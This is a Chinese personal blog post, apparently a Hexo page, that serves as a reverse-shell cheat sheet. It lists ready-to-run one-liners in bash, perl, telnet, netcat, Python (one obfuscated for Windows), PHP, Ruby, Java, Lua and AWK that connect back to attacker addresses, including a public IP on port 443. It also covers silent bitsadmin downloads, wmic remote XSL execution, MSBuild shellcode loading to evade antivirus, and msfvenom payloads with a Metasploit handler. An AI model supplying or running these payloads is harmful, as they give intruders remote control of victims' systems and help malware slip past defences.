<h2 id="Cobalt-Strike"><a href="#Cobalt-Strike" class="headerlink" title="Cobalt Strike"></a>Cobalt Strike</h2><h2 id="NC"><a href="#NC" class="headerlink" title="NC"></a>NC</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp <span class="number">1234</span>             <span class="comment">#kali</span></span><br><span class="line">nc -e cmd.exe <span class="number">192.168</span><span class="number">.31</span><span class="number">.86</span> <span class="number">1234</span>		<span class="comment">#win10 靶机</span></span><br></pre></td></tr></table></figure>

<p>##</p>
<p>bitsadmin（下载）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">用法</span><br><span class="line">#必须输入下载路径例如F:\xxx</span><br><span class="line">bitsadmin &#x2F;transfer 任务名 远程文件URL  本地路径</span><br><span class="line">bitsadmin &#x2F;transfer job12  https:&#x2F;&#x2F;blog.mydns.vip&#x2F;EFFind.rar  c:\EFFind.rar</span><br><span class="line">#默认情况下bitsadmin下载速度极慢，下载较大文件需要设置优先级提速，默认高到低：FOREGROUND, HIGH, NORMAL, or LOW 以下是用法示例：</span><br><span class="line">bitsadmin &#x2F;setpriority job12 foreground</span><br><span class="line">bitsadmin &#x2F;list  查看当前的任务</span><br><span class="line">bitsadmin &#x2F;rawreturn &#x2F;transfer getpayload https:&#x2F;&#x2F;blog.mydns.vip&#x2F;files&#x2F;PSTools.zip c:\p.zip  不显示进度，静默下载</span><br></pre></td></tr></table></figure>

<h2 id="wmic（后渗透）"><a href="#wmic（后渗透）" class="headerlink" title="wmic（后渗透）"></a>wmic（后渗透）</h2><p><a href="https://www.yuque.com/attachments/yuque/0/2020/txt/258143/1597415620020-2540d8fc-fcf8-4d64-aebe-314178168f4b.txt?_lake_card=%7B%22uid%22%3A%221594526553234-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Ftxt%2F258143%2F1597415620020-2540d8fc-fcf8-4d64-aebe-314178168f4b.txt%22%2C%22name%22%3A%22wmic-poc.xsl.txt%22%2C%22size%22%3A2595%2C%22type%22%3A%22text%2Fplain%22%2C%22ext%22%3A%22txt%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22Mghzk%22%2C%22card%22%3A%22file%22%7D">wmic-poc.xsl.txt</a>（将.txt 删除）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic os get /FORMAT:<span class="string">"http://192.168.31.86:8000/wmic-poc.xsl"</span></span><br></pre></td></tr></table></figure>

<h2 id="Windows-白加黑（免杀）"><a href="#Windows-白加黑（免杀）" class="headerlink" title="Windows 白加黑（免杀）"></a>Windows 白加黑（免杀）</h2><h3 id="MSBuild（未成功）"><a href="#MSBuild（未成功）" class="headerlink" title="MSBuild（未成功）"></a>MSBuild（未成功）</h3><p>下载<a href="https://y4er.com/post/download-shell/" target="_blank" rel="noopener">https://y4er.com/post/download-shell/</a><br>msbuild 可以编译执行 csharp 代码即 MSBuild<strong>.</strong>exe 运行 xml<br>在这里我们需要知道的是 msbuild 的路径</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#加载32位的shellcode需要用32位的msbuild/加载64位的shellcode需要用64位的msbuild</span></span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.<span class="number">0.30319</span>\MSBuild.exe  <span class="comment">#win10</span></span><br></pre></td></tr></table></figure>

<p>MSBuild.exe 都会在这几个目录下</p>
<p><strong>我们这里用 64 位的 shellcode 和 64 位的 win7 来操作。</strong><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1597415620166-bc1202d7-d919-4506-9e51-7aebdd651e4f.zip?_lake_card=%7B%22uid%22%3A%221594528162595-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1597415620166-bc1202d7-d919-4506-9e51-7aebdd651e4f.zip%22%2C%22name%22%3A%22msbuild-inline-task-master.zip%22%2C%22size%22%3A176997%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22satfM%22%2C%22card%22%3A%22file%22%7D">msbuild-inline-task-master.zip</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#生成shellcode</span></span><br><span class="line">msfvenom <span class="literal">-p</span> windows/x64/meterpreter/reverse_tcp lhost=<span class="number">192.168</span>.<span class="number">31.86</span> lport=<span class="number">1234</span> <span class="operator">-f</span> csharp</span><br></pre></td></tr></table></figure>

<p>我们用的是<code>executes x64 shellcode.xml</code>的模板，把里面 45 行之后的改为自己的 shellcode</p>
<p>生成新的<code>executes.xml</code><br>然后 msf 监听</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set PAYLOAD windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set LHOST <span class="number">192.168</span>.<span class="number">31.86</span></span><br><span class="line">set LPORT <span class="number">1234</span></span><br><span class="line">set ExitOnSession false</span><br><span class="line">set autorunscript migrate <span class="literal">-n</span> explorer.exe</span><br><span class="line">exploit <span class="literal">-j</span></span><br></pre></td></tr></table></figure>

<p>靶机上运行</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v3.<span class="number">5</span>&gt;MSBuild.exe <span class="string">"C:\Users\XinSai\Desktop\executes.xml"</span></span><br></pre></td></tr></table></figure>

<h1 id="linux（ubuntu-18-x64）"><a href="#linux（ubuntu-18-x64）" class="headerlink" title="linux（ubuntu 18 x64）"></a><a href="https://masterxsec.github.io/2017/07/21/Linux%E5%8F%8D%E5%BC%B9shell%E7%9A%8410%E7%A7%8D%E5%A7%BF%E5%8A%BF/" target="_blank" rel="noopener">linux（ubuntu 18 x64）</a></h1><h2 id="bash"><a href="#bash" class="headerlink" title="bash"></a>bash</h2><h3 id="1、Bash-TCP"><a href="#1、Bash-TCP" class="headerlink" title="1、Bash TCP"></a>1、Bash TCP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 1234</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.8.106/1234 0&gt;&amp;1  <span class="comment">#适合redhat系列,不建议用exec,兼容性并不好</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/bash -i &gt; /dev/tcp/192.168.56.212/1234 0&lt;&amp; 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<h3 id="Bash-UDP"><a href="#Bash-UDP" class="headerlink" title="Bash UDP"></a>Bash UDP</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc -u -lvp 1234														# -u表示采用udp监听</span><br><span class="line">sh -i &gt;&amp; &#x2F;dev&#x2F;udp&#x2F;192.168.31.192&#x2F;1234 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<h2 id="perl"><a href="#perl" class="headerlink" title="perl"></a>perl</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e <span class="string">'use Socket;$i="192.168.8.106";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");&#125;;'</span></span><br></pre></td></tr></table></figure>

<h2 id="telnet"><a href="#telnet" class="headerlink" title="telnet"></a>telnet</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#延迟片刻，等1234和1235均产生内容了在1234输入命令，在1235输出内容</span><br><span class="line">telnet 192.168.31.192 1234 | &#x2F;bin&#x2F;bash | telnet 192.168.31.192 1235</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm f;mkfifo f;cat f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|telnet 183.195.9.164 443 &gt; f</span><br></pre></td></tr></table></figure>

<h2 id="Netcat（NC）"><a href="#Netcat（NC）" class="headerlink" title="Netcat（NC）"></a>Netcat（NC）</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e &#x2F;bin&#x2F;sh 192.168.8.106 1234</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#&#x2F;bin&#x2F;bash   或者&#x2F;bin&#x2F;sh      只是显示不一样</span><br><span class="line">#遇到支持nc但是不支持-e参数</span><br><span class="line">rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|nc 192.168.8.106 1234 &gt;&#x2F;tmp&#x2F;f</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#1234输入命令，1235输出内容</span><br><span class="line">nc 192.168.8.106 1234|&#x2F;bin&#x2F;sh|nc 192.168.8.106 1235</span><br></pre></td></tr></table></figure>

<h2 id="python-1"><a href="#python-1" class="headerlink" title="python"></a>python</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">暂未测试</span><br><span class="line">#ipv4</span><br><span class="line">python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;183.195.9.164&quot;,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-i&quot;]);&#39;</span><br><span class="line">export RHOST&#x3D;&quot;183.195.9.164&quot;;export RPORT&#x3D;443;python -c &#39;import sys,socket,os,pty;s&#x3D;socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;&#x2F;bin&#x2F;sh&quot;)&#39;</span><br><span class="line">python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;183.195.9.164&quot;,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39;</span><br><span class="line"></span><br><span class="line">#ipv6</span><br><span class="line">python -c &#39;import socket,subprocess,os,pty;s&#x3D;socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((&quot;dead:beef:2::125c&quot;,443,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;pty.spawn(&quot;&#x2F;bin&#x2F;sh&quot;);&#39;</span><br><span class="line">#Copy Windows only:</span><br><span class="line">C:\Python27\python.exe -c &quot;(lambda __y, __g, __contextlib: [[[[[[[(s.connect((&#39;183.195.9.164&#39;, 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(&#39;except&#39;, (), &#123;&#39;__enter__&#39;: lambda self: None, &#39;__exit__&#39;: lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])&#125;)(), type(&#39;try&#39;, (), &#123;&#39;__enter__&#39;: lambda self: None, &#39;__exit__&#39;: lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]&#125;)())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[&#39;p2s_thread&#39;] in [(threading.Thread(target&#x3D;p2s, args&#x3D;[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[&#39;s2p_thread&#39;] in [(threading.Thread(target&#x3D;s2p, args&#x3D;[s, p]))]][0] for __g[&#39;p&#39;] in [(subprocess.Popen([&#39;\\windows\\system32\\cmd.exe&#39;], stdout&#x3D;subprocess.PIPE, stderr&#x3D;subprocess.STDOUT, stdin&#x3D;subprocess.PIPE))]][0])[1] for __g[&#39;s&#39;] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[&#39;p2s&#39;], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[&#39;s&#39;].send(__l[&#39;p&#39;].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[&#39;s&#39;], __l[&#39;p&#39;] in [(s, p)]][0])(&#123;&#125;), &#39;p2s&#39;)]][0] for __g[&#39;s2p&#39;], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[&#39;p&#39;].stdin.write(__l[&#39;data&#39;]), __after())[1] if (len(__l[&#39;data&#39;]) &gt; 0) else __after())(lambda: __this()) for __l[&#39;data&#39;] in [(__l[&#39;s&#39;].recv(1024))]][0] if True else __after())())(lambda: None) for __l[&#39;s&#39;], __l[&#39;p&#39;] in [(s, p)]][0])(&#123;&#125;), &#39;s2p&#39;)]][0] for __g[&#39;os&#39;] in [(__import__(&#39;os&#39;, __g, __g))]][0] for __g[&#39;socket&#39;] in [(__import__(&#39;socket&#39;, __g, __g))]][0] for __g[&#39;subprocess&#39;] in [(__import__(&#39;subprocess&#39;, __g, __g))]][0] for __g[&#39;threading&#39;] in [(__import__(&#39;threading&#39;, __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(&#39;contextlib&#39;))&quot;</span><br></pre></td></tr></table></figure>

<h2 id="php-1"><a href="#php-1" class="headerlink" title="php"></a>php</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#暂未测试</span><br><span class="line">php -r &#39;$sock&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);exec(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br><span class="line">php -r &#39;$s&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);$proc&#x3D;proc_open(&quot;&#x2F;bin&#x2F;sh -i&quot;, array(0&#x3D;&gt;$s, 1&#x3D;&gt;$s, 2&#x3D;&gt;$s),$pipes);&#39;</span><br><span class="line">php -r &#39;$s&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);shell_exec(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br><span class="line">php -r &#39;$s&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);&#96;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&#96;;&#39;</span><br><span class="line">php -r &#39;$s&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);system(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br><span class="line">php -r &#39;$s&#x3D;fsockopen(&quot;183.195.9.164&quot;,443);popen(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;, &quot;r&quot;);&#39;</span><br><span class="line">php -r &#39;$s&#x3D;\&#39;127.0.0.1\&#39;;$p&#x3D;443;@error_reporting(0);@ini_set(&quot;error_log&quot;,NULL);@ini_set(&quot;log_errors&quot;,0);@set_time_limit(0);umask(0);if($s&#x3D;fsockopen($s,$p,$n,$n))&#123;if($x&#x3D;proc_open(\&#39;&#x2F;bin&#x2F;sh$IFS-i\&#39;,array(array(\&#39;pipe\&#39;,\&#39;r\&#39;),array(\&#39;pipe\&#39;,\&#39;w\&#39;),array(\&#39;pipe\&#39;,\&#39;w\&#39;)),$p,getcwd()))&#123;stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true)&#123;if(feof($s))die(\&#39;connection&#x2F;closed\&#39;);if(feof($p[1]))die(\&#39;shell&#x2F;not&#x2F;response\&#39;);$r&#x3D;array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));&#125;fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);&#125;else&#123;die(&quot;proc_open&#x2F;disabled&quot;);&#125;&#125;else&#123;die(&quot;not&#x2F;connect&quot;);&#125;&#39;</span><br></pre></td></tr></table></figure>

<h2 id="ruby"><a href="#ruby" class="headerlink" title="ruby"></a>ruby</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#暂未测试</span><br><span class="line">ruby -rsocket -e&#39;f&#x3D;TCPSocket.open(&quot;183.195.9.164&quot;,443).to_i;exec sprintf(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&#39;</span><br><span class="line">ruby -rsocket -e &#39;exit if fork;c&#x3D;TCPSocket.new(&quot;183.195.9.164&quot;,&quot;443&quot;);while(cmd&#x3D;c.gets);IO.popen(cmd,&quot;r&quot;)&#123;|io|c.print io.read&#125;end&#39;</span><br><span class="line">#NOTE: Windows only</span><br><span class="line">ruby -rsocket -e &#39;c&#x3D;TCPSocket.new(&quot;183.195.9.164&quot;,&quot;443&quot;);while(cmd&#x3D;c.gets);IO.popen(cmd,&quot;r&quot;)&#123;|io|c.print io.read&#125;end&#39;</span><br></pre></td></tr></table></figure>

<h2 id="Java"><a href="#Java" class="headerlink" title="Java"></a>Java</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#暂未测试</span></span><br><span class="line">r = Runtime.getRuntime()</span><br><span class="line">p = r.exec([<span class="string">"/bin/bash"</span>,<span class="string">"-c"</span>,<span class="string">"exec 5&lt;&gt;/dev/tcp/183.195.9.164/443;cat &lt;&amp;5 | while read line; do \<span class="variable">$line</span> 2&gt;&amp;5 &gt;&amp;5; done"</span>] as String[])</span><br><span class="line">p.waitFor()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">String host=<span class="string">"127.0.0.1"</span>;</span><br><span class="line">int port=<span class="number">4444</span>;</span><br><span class="line">String cmd=<span class="string">"cmd.exe"</span>;</span><br><span class="line"><span class="keyword">Process</span> p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();<span class="keyword">while</span>(!s.isClosed())&#123;<span class="keyword">while</span>(pi.available()&gt;<span class="number">0</span>)so.write(pi.read());<span class="keyword">while</span>(pe.available()&gt;<span class="number">0</span>)so.write(pe.read());<span class="keyword">while</span>(si.available()&gt;<span class="number">0</span>)po.write(si.read());so.flush();po.flush();Thread.sleep(<span class="number">50</span>);<span class="keyword">try</span> &#123;p.exitValue();<span class="keyword">break</span>;&#125;<span class="keyword">catch</span> (Exception e)&#123;&#125;&#125;;p.destroy();s.close();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Thread thread = new Thread()&#123;</span><br><span class="line">    public void run()&#123;</span><br><span class="line">        // Reverse shell here</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">thread.start();</span><br></pre></td></tr></table></figure>

<h2 id="Lua"><a href="#Lua" class="headerlink" title="Lua"></a>Lua</h2><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lua -e <span class="string">"require('socket');require('os');t=socket.tcp();t:connect('183.195.9.164','443');os.execute('/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3');"</span></span><br></pre></td></tr></table></figure>

<h2 id="AWK-反弹"><a href="#AWK-反弹" class="headerlink" title="AWK 反弹"></a>AWK 反弹</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk <span class="string">'BEGIN &#123;s = "/inet/tcp/0/183.195.9.164/443"; while(42) &#123; do&#123; printf "shell&gt;" |&amp; s; s |&amp; getline c; if(c)&#123; while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); &#125; &#125; while(c != "exit") close(s); &#125;&#125;'</span> /dev/null</span><br></pre></td></tr></table></figure>

<h1 id="Meterpreter-Shell"><a href="#Meterpreter-Shell" class="headerlink" title="Meterpreter Shell"></a>Meterpreter Shell</h1><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=<span class="number">183.195</span>.<span class="number">9.164</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> exe &gt; reverse.exe</span><br><span class="line">msfvenom <span class="literal">-p</span> windows/shell_reverse_tcp LHOST=<span class="number">183.195</span>.<span class="number">9.164</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> exe &gt; reverse.exe</span><br><span class="line">msfvenom <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp LHOST=<span class="number">183.195</span>.<span class="number">9.164</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> elf &gt;reverse.elf</span><br><span class="line">msfvenom <span class="literal">-p</span> linux/x86/shell_reverse_tcp LHOST=<span class="number">183.195</span>.<span class="number">9.164</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> elf &gt;reverse.elf</span><br><span class="line">msfvenom <span class="literal">-p</span> linux/x86/meterpreter/reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> elf &gt; shell.elf</span><br><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> exe &gt; shell.exe</span><br><span class="line">msfvenom <span class="literal">-p</span> osx/x86/shell_reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> macho &gt; shell.macho</span><br><span class="line">msfvenom <span class="literal">-p</span> windows/meterpreter/reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> asp &gt; shell.asp</span><br><span class="line">msfvenom <span class="literal">-p</span> java/jsp_shell_reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> raw &gt; shell.jsp</span><br><span class="line">msfvenom <span class="literal">-p</span> java/jsp_shell_reverse_tcp LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> war &gt; shell.war</span><br><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_python LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> raw &gt; shell.py</span><br><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_bash LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> raw &gt; shell.sh</span><br><span class="line">msfvenom <span class="literal">-p</span> cmd/unix/reverse_perl LHOST=<span class="string">"183.195.9.164"</span> LPORT=<span class="number">443</span> <span class="operator">-f</span> raw &gt; shell.pl</span><br></pre></td></tr></table></figure>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-08-14T15:17:20.430Z" itemprop="dateUpdated">2020-08-14 23:17:20</time>
</span><br>


        
        这里可以写作者留言，标签和 hexo 中所有变量及辅助函数等均可调用，示例：<a href="/2020/08/14/pq62c9/" target="_blank" rel="external">https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/</a>
        
    </div>
    
    <footer>
        <a href="https://www.yuque.com/xiaogege-yxttw">
            <img src="/img/avatar.jpg" alt="无名之辈">
            无名之辈
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/&title=《反弹shell》 — 小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/&title=《反弹shell》 — 小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《反弹shell》 — 小白帽&url=https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/2020/08/14/pq62c9/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between flex-row-reverse">
  

  
    <div class="waves-block waves-effect next">
      <a href="/2020/08/06/gca6ds/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">提权与hash读取</h4>
      </a>
    </div>
  
</nav>



    




















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        谢谢大爷~
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/wechat.jpg" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
